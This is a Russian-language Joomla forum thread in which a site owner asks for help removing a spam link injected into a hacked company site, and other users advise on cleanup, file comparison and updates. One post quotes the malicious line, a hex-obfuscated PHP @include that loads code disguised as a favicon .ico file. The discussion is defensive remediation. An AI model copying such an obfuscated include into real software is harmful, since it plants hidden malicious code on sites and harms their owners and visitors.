0 Пользователей и 1 Гость просматривают эту тему.
  • 15 Ответов
  • 315 Просмотров
*

alta

  • Новичок
  • 6
  • 0 / 0
Добрый день!
На сайте (в подвале) появилась гиперссылка "Anal", ведущая на php скрипт, который закодирован. По переходу, по линку открывается этот php файлик с информацией, какая там информация думаю сами понимаете.
Так вот, соответственно, этот файл с хостинга я удалил. Но вот куда вставили саму эту ссылку - не понятно. Перерыл весь шаблон - пусто. Даже намека нет. Ссылка содержится на всех страницах сайта.
Не подскажите где может быть расположена вышеупомянутая ссылка?
Скриншоты прикладывать не стал, ибо думаю и так понятно что есть ссылка в подвале сайта, которая отображается на всех страницах сайта.
Вот что показывает файрбаг.
*

draff

  • Живу я здесь
  • 3248
  • 213 / 5
  • Ищу работу
Re: Гиперссылка в подвале сайта
« Ответ #1 : 18.09.2017, 13:36:58 »
index.php в корне сайта. а с отключенным яваскрипт ссылка есть ?
Удалю вирус, js miner с сайта. Обновление Virtuemart. Тема в коммерческом разделе     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

alta

  • Новичок
  • 6
  • 0 / 0
Re: Гиперссылка в подвале сайта
« Ответ #2 : 18.09.2017, 13:55:52 »
index.php в корне сайта. а с отключенным яваскрипт ссылка есть ?

В php не силен, но мне кажется тут нет ничего, что указывало бы на проблему.


С отключенным javascript тоже ссылка есть.
*

ProtectYourSite

  • Завсегдатай
  • 1349
  • 84 / 4
  • Безопасность вебсайтов
Re: Гиперссылка в подвале сайта
« Ответ #3 : 18.09.2017, 14:00:17 »
Да ладно, первая строчка с include
Смотрите какой файл подключается, и его тоже удаляйте.
Но это Вы все  равно устраняете последствия, а не причину заражения. В идеале сайт хорошо пролечить, а то через неделю ситуация может повториться.
*

draff

  • Живу я здесь
  • 3248
  • 213 / 5
  • Ищу работу
Re: Гиперссылка в подвале сайта
« Ответ #4 : 18.09.2017, 14:17:35 »
В php не силен, но мне кажется тут нет ничего, что указывало бы на проблему.

С отключенным javascript тоже ссылка есть.
Замените на файл с архива Джумла,заодно и сравните с файлом на хостинге.
Удалю вирус, js miner с сайта. Обновление Virtuemart. Тема в коммерческом разделе     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

voland

  • Легенда
  • 9876
  • 545 / 107
  • Эта строка съедает место на вашем мониторе
Re: Гиперссылка в подвале сайта
« Ответ #5 : 18.09.2017, 14:24:38 »
По опыту - не только этот файл заражен, наверняка найдется с десяток или несколько еще зараженных файлов.
Лечиться, лечиться и еще раз лечиться
*

alta

  • Новичок
  • 6
  • 0 / 0
Re: Гиперссылка в подвале сайта
« Ответ #6 : 18.09.2017, 14:27:50 »
Замените на файл с архива Джумла,заодно и сравните с файлом на хостинге.

Сравнил, заменил. За исключением строчки
Код
@include "\x2fvar\x2fwww\x2fati\x2fdat\x61/ww\x77/03\x61ti.\x72u/a\x75tos\x6fft/\x64ata\x2fprv\x7a/fa\x76ico\x6e_55\x3460e\x2eico";
никаких отличий больше нет. Эта строчка указывает на шеллы?
*

voland

  • Легенда
  • 9876
  • 545 / 107
  • Эта строка съедает место на вашем мониторе
*

alta

  • Новичок
  • 6
  • 0 / 0
Re: Гиперссылка в подвале сайта
« Ответ #8 : 18.09.2017, 14:37:24 »
По опыту - не только этот файл заражен, наверняка найдется с десяток или несколько еще зараженных файлов.
Лечиться, лечиться и еще раз лечиться
Да

В таком случае вы правы, зараженный файл не один, к сожалению.
Получается что нет смысла искать HTML вставку на сайте, нужно лечить все phpшники и не только?
*

voland

  • Легенда
  • 9876
  • 545 / 107
  • Эта строка съедает место на вашем мониторе
Re: Гиперссылка в подвале сайта
« Ответ #9 : 18.09.2017, 14:38:06 »
Ага.
А еще надо закрывать дыры, через которые заразили
*

wishlight

  • Живу я здесь
  • 4077
  • 249 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Гиперссылка в подвале сайта
« Ответ #10 : 18.09.2017, 17:10:56 »
Вообще по возможности обновить Joomla до актуальной версии после лечения. Нового особо добавить нечего, но в не поддерживаемых версиях Joomla типа 2.5 могут быть дыры.

Вы бы указали вашу версию джумла и расширения установленные на сайте.
*

alta

  • Новичок
  • 6
  • 0 / 0
Re: Гиперссылка в подвале сайта
« Ответ #11 : 19.09.2017, 09:52:13 »
Вообще по возможности обновить Joomla до актуальной версии после лечения. Нового особо добавить нечего, но в не поддерживаемых версиях Joomla типа 2.5 могут быть дыры.

Вы бы указали вашу версию джумла и расширения установленные на сайте.

Версия jooml'ы 2.5.14
Расширений на самом деле очень много. Всего 13 страниц по 20 штук на каждую. Конечно же они не все используются.

Терпеть ненавижу джумлу, поэтому и знаний об этом движке у меня минимальные. Поэтому извиняюсь заранее, если вопрос может показаться глупым. Есть какой-нибудь список расширений, в которых 100% имеются шелы?
*

vipiusss

  • Гуру
  • 5748
  • 343 / 10
  • Скайп: renor_
Re: Гиперссылка в подвале сайта
« Ответ #12 : 19.09.2017, 10:24:16 »
Терпеть ненавижу джумлу, поэтому и знаний об этом движке у меня минимальные.

@alta Думаю вам стоит найти исполнителя в новой (своей) теме в комм.разделе на анализ сайта и в его же лице исправление дыр и остального, что надо.
По иному в теме перепиской одной вам никто не поможет.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

wishlight

  • Живу я здесь
  • 4077
  • 249 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Гиперссылка в подвале сайта
« Ответ #13 : 19.09.2017, 10:35:54 »
Это уже плохо. Конечно вас взломают.
Версия jooml'ы 2.5.14
Вообще не понял
Расширений на самом деле очень много. Всего 13 страниц по 20 штук на каждую. Конечно же они не все используются.

Есть какой-нибудь список расширений, в которых 100% имеются шелы?
*

alta

  • Новичок
  • 6
  • 0 / 0
Re: Гиперссылка в подвале сайта
« Ответ #14 : 19.09.2017, 10:38:08 »
@alta Думаю вам стоит найти исполнителя в новой (своей) теме в комм.разделе на анализ сайта и в его же лице исправление дыр и остального, что надо.
По иному в теме перепиской одной вам никто не поможет.

Сайт не мой (компании), поэтому к коммерческому разделу буду прибегать только в крайних случаях. Сначала попробую сам разобраться. Да и думаю тот раздел направлен больше на оказание услуг для физических лиц. Хотя если имеется человек, у которого зарегистрирована своя компания, буду благодарен если сообщите его контакты. Буду иметь ввиду.
P.S. на данный момент проводится сканирование айболитом, посмотрим что там в отчете будет.
*

vipiusss

  • Гуру
  • 5748
  • 343 / 10
  • Скайп: renor_
Re: Гиперссылка в подвале сайта
« Ответ #15 : 19.09.2017, 10:45:18 »
Есть и безнал. В этом нет проблем, подскажу даже по требованию, к кому можно обратится.
А по поводу сам: ну тут ваше дело.

первая строчка с include

И лучше переопределить для одного запроса: require_once JPATH_THEMES
Если надо синтаксис, то вот:  <?php require_once JPATH_THEMES.'/ваш путь от корня/файл'; ?>
« Последнее редактирование: 19.09.2017, 10:55:15 от vipiusss »
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Главная страница сайта

Автор Vasily

Ответов: 11
Просмотров: 152
Последний ответ 15.05.2018, 20:37:17
от lexxbry
Карта сайта для Joomla! 2.5.11

Автор Anna

Ответов: 1
Просмотров: 462
Последний ответ 24.02.2018, 22:37:17
от SeBun
Как изменить название сайта в шапке?

Автор Екатрина1986

Ответов: 4
Просмотров: 244
Последний ответ 13.02.2018, 12:35:19
от Ilhom666
Не получается изменить динамическую шапку сайта на Joomla 2.5

Автор lel

Ответов: 14
Просмотров: 679
Последний ответ 06.02.2018, 10:40:18
от SeBun
Ошибка после заливки сайта на хостинг

Автор diamails

Ответов: 4
Просмотров: 316
Последний ответ 05.01.2018, 11:40:53
от diamails